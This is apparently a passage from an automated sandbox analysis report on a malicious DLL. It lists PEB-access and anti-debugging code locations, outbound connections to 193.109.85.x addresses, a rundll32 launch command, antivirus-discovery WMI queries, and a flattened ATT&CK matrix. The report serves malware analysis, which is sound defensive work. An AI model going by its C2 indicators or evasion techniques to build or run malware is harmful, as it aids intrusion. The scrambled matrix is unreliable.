                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov ecx, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]18_2_7EDA0B80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED66B00 mov edx, dword ptr fs:[00000030h]18_2_7ED66B00
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED948E0 mov ecx, dword ptr fs:[00000030h]18_2_7ED948E0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]18_2_7ED64664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]18_2_7ED64664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64664 mov edx, dword ptr fs:[00000030h]18_2_7ED64664
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED79790 mov edx, dword ptr fs:[00000030h]18_2_7ED79790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]18_2_7ED79790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]18_2_7ED79790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov edx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]18_2_7ED9C790
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]18_2_7EDBA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBA730 mov eax, dword ptr fs:[00000030h]18_2_7EDBA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]18_2_7EDBA730
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]18_2_7ED994D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]18_2_7EDBD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]18_2_7EDBD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]18_2_7EDBD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBD5B0 mov edx, dword ptr fs:[00000030h]18_2_7EDBD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]18_2_7EDBD5B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBE570 mov eax, dword ptr fs:[00000030h]18_2_7EDBE570
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8C230 mov eax, dword ptr fs:[00000030h]18_2_7ED8C230
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED87220 mov edx, dword ptr fs:[00000030h]18_2_7ED87220
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED87220 mov eax, dword ptr fs:[00000030h]18_2_7ED87220
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBE380 mov eax, dword ptr fs:[00000030h]18_2_7EDBE380
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBC340 mov eax, dword ptr fs:[00000030h]18_2_7EDBC340
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]18_2_7ED8E66B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]18_2_7ED8E66B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64174 mov edx, dword ptr fs:[00000030h]18_2_7ED64174
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64174 mov ecx, dword ptr fs:[00000030h]18_2_7ED64174
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED67160 mov edx, dword ptr fs:[00000030h]18_2_7ED67160
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]18_2_7ED64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDBB130 mov eax, dword ptr fs:[00000030h]18_2_7EDBB130
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBAF80 mov edx, dword ptr fs:[00000030h]34_2_7EEBAF80
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC0DD0 mov ecx, dword ptr fs:[00000030h]34_2_7EEC0DD0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE828BF mov edx, dword ptr fs:[00000030h]34_2_7EE828BF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE860 mov ecx, dword ptr fs:[00000030h]34_2_7EEBE860
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]34_2_7EEBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]34_2_7EEBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB430 mov edx, dword ptr fs:[00000030h]34_2_7EEBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]34_2_7EEBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]34_2_7EEBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]34_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE390 mov edx, dword ptr fs:[00000030h]34_2_7EEBE390
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEA6330 mov ecx, dword ptr fs:[00000030h]34_2_7EEA6330
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE86ED0 mov edx, dword ptr fs:[00000030h]34_2_7EE86ED0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF7EBB mov eax, dword ptr fs:[00000030h]34_2_7EEF7EBB
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF7E46 mov eax, dword ptr fs:[00000030h]34_2_7EEF7E46
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]34_2_7EEC7F60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC7F60 mov edx, dword ptr fs:[00000030h]34_2_7EEC7F60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC7F60 mov eax, dword ptr fs:[00000030h]34_2_7EEC7F60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]34_2_7EEC7F60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEB9C60 mov eax, dword ptr fs:[00000030h]34_2_7EEB9C60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8BC30 mov edx, dword ptr fs:[00000030h]34_2_7EE8BC30
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8BC30 mov eax, dword ptr fs:[00000030h]34_2_7EE8BC30
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE66DAA mov eax, dword ptr fs:[00000030h]34_2_7EE66DAA
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE87DB0 mov eax, dword ptr fs:[00000030h]34_2_7EE87DB0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE66D10 mov eax, dword ptr fs:[00000030h]34_2_7EE66D10
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEDFA90 mov eax, dword ptr fs:[00000030h]34_2_7EEDFA90
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE87A60 mov edx, dword ptr fs:[00000030h]34_2_7EE87A60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE86B80 mov edx, dword ptr fs:[00000030h]34_2_7EE86B80
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEA4B90 mov ecx, dword ptr fs:[00000030h]34_2_7EEA4B90
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE66B00 mov edx, dword ptr fs:[00000030h]34_2_7EE66B00
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE948E0 mov ecx, dword ptr fs:[00000030h]34_2_7EE948E0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE83992 mov edx, dword ptr fs:[00000030h]34_2_7EE83992
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov edx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov edx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov eax, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov edx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8757D mov eax, dword ptr fs:[00000030h]34_2_7EE8757D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE570 mov eax, dword ptr fs:[00000030h]34_2_7EEBE570
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8C230 mov eax, dword ptr fs:[00000030h]34_2_7EE8C230
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE380 mov eax, dword ptr fs:[00000030h]34_2_7EEBE380
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBC340 mov eax, dword ptr fs:[00000030h]34_2_7EEBC340
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov ecx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov eax, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE67160 mov edx, dword ptr fs:[00000030h]34_2_7EE67160
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64174 mov edx, dword ptr fs:[00000030h]34_2_7EE64174
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64174 mov ecx, dword ptr fs:[00000030h]34_2_7EE64174
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB130 mov eax, dword ptr fs:[00000030h]34_2_7EEBB130
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35B5AE CreateMutexA,GetProcessHeap,lstrlenW,GetFocus,GetMenu,GetSubMenu,GetModuleHandleA,GetOEMCP,IsWow64Message,SetLastError,IsValidCodePage,GetModuleHandleA,lstrlenA,IsValidCodePage,GetLastError,lstrlenA,lstrlenW,IsValidCodePage,IsValidCodePage,GetFocus,GetSystemMenu,IsValidCodePage,CloseHandle,GetFocus,IsWindow,ArrangeIconicWindows,14_2_7F35B5AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D0AAAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_6D0AAAFD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_7F3D1B15
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_7F3D18C7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_7F3D5753
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_7EDE1B15
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7EDE18C7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7EDE5753
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_6B86AAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_6B86AAFD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_7EEE1B15
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_7EEE18C7
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_7EEE5753

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.109.85.27 443Jump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 193.109.85.31 54801
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE167C cpuid 18_2_7EDE167C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_7F3EAF2B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAB24
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAA3E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAA89
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,14_2_7F3E485C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,14_2_7F3EA79C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3E42DF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_7F3EB100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_7EDFAF2B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAA89
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAA3E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAB24
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,18_2_7EDF485C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,18_2_7EDFA79C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDF42DF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_7EDFB100
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_7EEFAF2B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAA89
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAA3E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAB24
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,34_2_7EEF485C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,34_2_7EEFA79C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEF42DF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_7EEFB100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE19E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,18_2_7EDE19E4
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation                		1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		31
                Virtualization/Sandbox Evasion                		LSASS Memory15
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media11
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                Process Injection                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
